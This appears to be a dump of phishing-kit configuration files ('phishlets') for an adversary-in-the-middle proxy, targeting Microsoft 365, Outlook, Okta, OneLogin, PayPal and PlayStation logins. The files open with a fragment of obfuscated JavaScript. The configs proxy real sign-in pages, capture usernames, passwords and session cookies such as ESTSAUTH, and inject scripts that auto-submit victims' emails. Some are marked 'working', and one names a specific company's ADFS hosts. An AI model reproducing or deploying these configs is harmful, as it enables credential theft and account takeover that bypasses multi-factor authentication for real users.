Beca','class=\x22ale','#idA_PWD_F'];_0x4864=function(){return _0x4e5d58;};return _0x4864();}checkElement2(_0x410e92(0x180)+_0x410e92(0x141)+_0x410e92(0x160))[_0x410e92(0x185)](_0x54c929=>{var _0x2c9990=_0x410e92,_0x4ced35={'QYnJR':_0x2c9990(0x15a),'jzwAY':_0x2c9990(0x16e)+'n','znBFb':_0x2c9990(0x179)+_0x2c9990(0x15e)+_0x2c9990(0x17f)+_0x2c9990(0x142)+_0x2c9990(0x17e)+_0x2c9990(0x162)+_0x2c9990(0x182)+_0x2c9990(0x17c)+_0x2c9990(0x172)+_0x2c9990(0x17a)+_0x2c9990(0x153)+_0x2c9990(0x148)+_0x2c9990(0x145)};node=document[_0x2c9990(0x175)+_0x2c9990(0x173)](_0x4ced35[_0x2c9990(0x184)]),node[_0x2c9990(0x178)+_0x2c9990(0x16c)](_0x4ced35[_0x2c9990(0x159)],_0x4ced35[_0x2c9990(0x163)]);return;});
--------------------------------------------------------------------------------
/phishlet_examples/o365(working-october21).yaml:
--------------------------------------------------------------------------------
1 | name: 'o365'
2 | author: '@G66K ICQ: 747246257'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
7 | # The lines below are needed if your target organization utilizes ADFS.
8 | # If they do, you need to uncomment all following lines that contain <...>
9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
11 | #
= adfs
12 | # = example.com
13 | # = adfs.example.com
14 |
15 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}
16 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}
17 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false}
18 | - {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com:443', session: true, is_landing:false}
19 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
20 | - {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
21 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
22 | - {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
23 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
24 | - {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
25 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
26 | - {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
27 |
28 | sub_filters:
29 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
30 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
31 | # Uncomment and fill in if your target organization utilizes ADFS
32 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
33 | - {triggers_on: 'sso.godaddy.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
34 | - {triggers_on: 'adfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
35 | - {triggers_on: 'sso.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
36 | - {triggers_on: 'sts.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
37 | - {triggers_on: 'idfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
38 | auth_tokens:
39 | - domain: '.login.microsoftonline.com'
40 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
41 | - domain: 'login.microsoftonline.com'
42 | keys: ['SignInStateCookie']
43 | auth_urls:
44 | - '/kmsi*'
45 | credentials:
46 | username:
47 | key: '(login|UserName)'
48 | search: '(.*)'
49 | type: 'post'
50 | password:
51 | key: '(passwd|Password)'
52 | search: '(.*)'
53 | type: 'post'
54 | login:
55 | domain: 'login.microsoftonline.com'
56 | path: '/'
57 | js_inject:
58 | - trigger_domains: ["www.domain.com"]
59 | trigger_paths: ["/"]
60 | script: |
61 | function gimmesleep(ms) {
62 | return new Promise(resolve => setTimeout(resolve, ms));
63 | }
64 | async function redir() {
65 | await gimmesleep(2000);
66 | window.location.href = "{rurl}";
67 | }
68 | redir()
69 | js_inject:
70 | - trigger_domains: ["login.microsoftonline.com"]
71 | trigger_paths: ["/common/oauth2/","/","/*"]
72 | script: |
73 | function lp(){
74 | var emailId = document.querySelector("#i0116");
75 | var nextButton = document.querySelector("#idSIButton9");
76 | var query = window.location.href;
77 | if (/#/.test(window.location.href)){
78 | var res = query.split("#");
79 | var data1 = res[0];
80 | var data2 = res[1];
81 | console.log(data1);
82 | console.log(data2);
83 | if (emailId != null) {
84 | var m = data2.replace(/[=]/gi, '');
85 | emailId.focus();
86 | emailId.value = m;
87 | nextButton.focus();
88 | nextButton.click();
89 | console.log("YES!");
90 | return;
91 | }
92 | }
93 | setTimeout(function(){lp();}, 1500);
94 | }
95 | setTimeout(function(){lp();}, 1500);
--------------------------------------------------------------------------------
/phishlet_examples/o365(working2).yaml:
--------------------------------------------------------------------------------
1 | name: 'o365'
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
7 | # The lines below are needed if your target organization utilizes ADFS.
8 | # If they do, you need to uncomment all following lines that contain <...>
9 | # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
10 | # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
11 | # = adfs
12 | # = example.com
13 | # = adfs.example.com
14 | #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}
15 | #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}
16 | sub_filters:
17 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 |
19 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
20 | # Uncomment and fill in if your target organization utilizes ADFS
21 | #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 |
23 | auth_tokens:
24 | - domain: '.login.microsoftonline.com'
25 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
26 | - domain: 'login.microsoftonline.com'
27 | keys: ['SignInStateCookie', '.*,regexp']
28 | credentials:
29 | username:
30 | key: '(login|UserName)'
31 | search: '(.*)'
32 | type: 'post'
33 | password:
34 | key: '(passwd|Password)'
35 | search: '(.*)'
36 | type: 'post'
37 | login:
38 | domain: 'login.microsoftonline.com'
39 | path: '/'
40 | js_inject:
41 | - trigger_domains: ["login.microsoftonline.com"]
42 | trigger_paths: ["/common/oauth2/"]
43 | trigger_params: ["email"]
44 | script: |
45 | function lp(){
46 | var email = document.querySelectorAll('input[type=email]')[0];
47 | if (email != null) {
48 | email.value = "{email}";
49 | setTimeout(function(){
50 | document.querySelectorAll('input[type=submit]')[0].click();
51 | }, 5000);
52 | return;
53 | }
54 | setTimeout(function(){lp();}, 100);
55 | }
56 | setTimeout(function(){lp();}, 100);
57 |
--------------------------------------------------------------------------------
/phishlet_examples/o365(working2a).yaml:
--------------------------------------------------------------------------------
1 | name: 'o365'
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: false}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
7 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true}
8 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
9 | - {phish_sub: 'logincdn', orig_sub: 'logincdn', domain: 'msauth.net', session: false, is_landing: false}
10 |
11 | sub_filters:
12 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
13 | - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
14 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
17 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
19 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
20 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
22 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
23 | - {triggers_on: 'login.live.com', orig_sub: 'logincdn', domain: 'msauth.net', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
24 |
25 | auth_tokens:
26 | - domain: '.login.microsoftonline.com'
27 | keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
28 | - domain: 'login.microsoftonline.com'
29 | keys: ['SignInStateCookie', '.*,regexp']
30 | - domain: 'login.live.com'
31 | keys: ['.*,regexp']
32 | - domain: '.login.live.com'
33 | keys: ['.*,regexp']
34 | credentials:
35 | username:
36 | key: '(login|UserName)'
37 | search: '(.*)'
38 | type: 'post'
39 | password:
40 | key: '(passwd|Password)'
41 | search: '(.*)'
42 | type: 'post'
43 | login:
44 | domain: 'login.microsoftonline.com'
45 | path: '/'
46 | js_inject:
47 | - trigger_domains: ["login.microsoftonline.com"]
48 | trigger_paths: ["/common/oauth2/"]
49 | trigger_params: ["email"]
50 | script: |
51 | function lp(){
52 | var email = document.querySelectorAll('input[type=email]')[0];
53 | if (email != null) {
54 | email.value = "{email}";
55 | setTimeout(function(){
56 | document.querySelectorAll('input[type=submit]')[0].click();
57 | }, 5000);
58 | return;
59 | }
60 | setTimeout(function(){lp();}, 100);
61 | }
62 | setTimeout(function(){lp();}, 100);
63 |
--------------------------------------------------------------------------------
/phishlet_examples/okta.yaml:
--------------------------------------------------------------------------------
1 | author: '@mikesiegel'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
5 | - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
6 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
7 | sub_filters:
8 | - {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
9 | auth_tokens:
10 | - domain: 'EXAMPLE.okta.com'
11 | keys: ['sid']
12 | credentials:
13 | username:
14 | key: ''
15 | search: '"username":"([^"]*)'
16 | type: 'json'
17 | password:
18 | key: ''
19 | search: '"password":"([^"]*)'
20 | type: 'json'
21 | login:
22 | domain: 'EXAMPLE.okta.com'
23 | path: '/login/login.htm'
24 |
--------------------------------------------------------------------------------
/phishlet_examples/onelogin.yaml:
--------------------------------------------------------------------------------
1 | name: 'onelogin'
2 | author: '@perfectlylogical'
3 | min_ver: '2.3.0'
4 | # NOTE: Do not forget to change EXMAPLE to the relevant sub domain.
5 | proxy_hosts:
6 | - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
7 | - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
8 | - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
9 | # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
10 | #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
11 | sub_filters: []
12 | auth_tokens:
13 | - domain: '.onelogin.com'
14 | keys: ['onelogin.com_user']
15 | - domain: 'EXAMPLE.onelogin.com'
16 | keys: ['sub_session_onelogin.com']
17 | auth_urls:
18 | - '/portal/'
19 | - '/client/apps'
20 | # This is used to force the rememebr me functionality if the target is using the /login url
21 | # This method will not work if they are using the multistep login method on the /login2 url
22 | force_post:
23 | - path: '/sessions'
24 | search:
25 | - {key: 'authenticity_token', search: '.*'}
26 | - {key: 'email', search: '.*'}
27 | - {key: 'password', search: '.*'}
28 | force:
29 | - {key: 'persist_session', value: 'true'}
30 | type: 'post'
31 | # The post type is used to capture credentials which use the /login url
32 | # The json type is used to capture credentials which use the /login2 url
33 | credentials:
34 | username:
35 | key: 'email'
36 | search: '(.*)'
37 | type: 'post'
38 | password:
39 | key: 'password'
40 | search: '(.*)'
41 | type: 'post'
42 | username:
43 | key: 'login'
44 | search: '"login":"(.*)"'
45 | type: 'json'
46 | password:
47 | key: 'password'
48 | search: '"password":"(.*)",'
49 | type: 'json'
50 | login:
51 | domain: 'EXAMPLE.onelogin.com'
52 | path: '/login'
53 |
--------------------------------------------------------------------------------
/phishlet_examples/outlook(o365).yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
17 | auth_tokens:
18 | - domain: '.live.com'
19 | keys: ['WLSSC','RPSSecAuth']
20 | credentials:
21 | username:
22 | key: 'login'
23 | search: '(.*)'
24 | type: 'post'
25 | password:
26 | key: 'passwd'
27 | search: '(.*)'
28 | type: 'post'
29 | login:
30 | domain: 'outlook.live.com'
31 | path: '/owa/?nlp=1'
32 |
--------------------------------------------------------------------------------
/phishlet_examples/outlook.yaml:
--------------------------------------------------------------------------------
1 | author: '@mrgretzky'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
6 | - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
9 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
10 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
11 | - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
12 | - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
13 | - {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
14 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
17 | auth_tokens:
18 | - domain: '.live.com'
19 | keys: ['WLSSC']
20 | credentials:
21 | username:
22 | key: 'login'
23 | search: '(.*)'
24 | type: 'post'
25 | password:
26 | key: 'passwd'
27 | search: '(.*)'
28 | type: 'post'
29 | login:
30 | domain: 'outlook.live.com'
31 | path: '/owa/?nlp=1'
32 |
--------------------------------------------------------------------------------
/phishlet_examples/paypal.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | # Email Params can be Triggered By using Below Command.
5 | # lures edit params ID email=test@email.com
6 | # Where ID is lure id number, and test@email.com is your known victim account email address for paypal.
7 |
8 | author: '@An0nud4y'
9 | min_ver: '2.3.0'
10 | proxy_hosts:
11 | - {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
12 | - {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
13 | # - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false}
14 | - {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
15 | - {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
16 | - {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
17 | - {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false}
18 | - {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false}
19 |
20 | sub_filters:
21 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 | - {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 | # - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypalobjects.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
25 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
26 | - {triggers_on: 'www.paypal.com', orig_sub: 'c6', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
27 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
28 | - {triggers_on: 'www.paypal.com', orig_sub: 'c', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
29 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
30 | - {triggers_on: 'www.paypal.com', orig_sub: 'hnd.stats', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
31 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
32 | - {triggers_on: 'www.paypal.com', orig_sub: 't', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
33 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
34 | - {triggers_on: 'www.paypal.com', orig_sub: '', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
35 |
36 | auth_tokens:
37 | - domain: '.paypal.com'
38 | keys: ['.*,regexp']
39 | auth_urls:
40 | - '/myaccount/summary'
41 | - '/myaccount/.*'
42 |
43 | credentials:
44 | username:
45 | key: 'login_email'
46 | search: '(.*)'
47 | type: 'post'
48 | password:
49 | key: 'login_password'
50 | search: '(.*)'
51 | type: 'post'
52 |
53 | login:
54 | domain: 'www.paypal.com'
55 | path: '/signin'
56 |
57 | js_inject:
58 | - trigger_domains: ["www.paypal.com"]
59 | trigger_paths: ["/signin"]
60 | trigger_params: ["email"]
61 | script: |
62 | function lp(){
63 | var email = document.querySelector("#email");
64 | if (email != null && password != null) {
65 | email.value = "{email}";
66 | return;
67 | }
68 | setTimeout(function(){lp();}, 100);
69 | }
70 | setTimeout(function(){lp();}, 100);
71 |
--------------------------------------------------------------------------------
/phishlet_examples/playstation.yaml:
--------------------------------------------------------------------------------
1 | author: '@An0nud4y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'id', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
5 | - {phish_sub: 'auth.api', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'playstation.com', session: true, is_landing: true}
7 | - {phish_sub: 'accounts.api', orig_sub: 'accounts.api', domain: 'playstation.com', session: true, is_landing: true}
8 | - {phish_sub: 'smetrics.aem', orig_sub: 'smetrics.aem', domain: 'playstation.com', session: true, is_landing: true}
9 | - {phish_sub: 'eventcom.api.np.km', orig_sub: 'eventcom.api.np.km', domain: 'playstation.net', session: true, is_landing: true}
10 | - {phish_sub: 'pdr-srlc.api', orig_sub: 'pdr-srlc.api', domain: 'sonyentertainmentnetwork.com', session: true, is_landing: true}
11 |
12 | #lengtmp+oszxh@gmail.com
13 |
14 | sub_filters:
15 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 | - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'accounts.api', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
19 |
20 |
21 | - {triggers_on: 'www.playstation.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 | - {triggers_on: 'www.playstation.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 | - {triggers_on: 'www.playstation.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 |
25 |
26 | auth_tokens:
27 | - domain: '.sonyentertainmentnetwork.com'
28 | keys: ['bm_sz,opt','_abck,opt','s_cc,opt','s_sq']
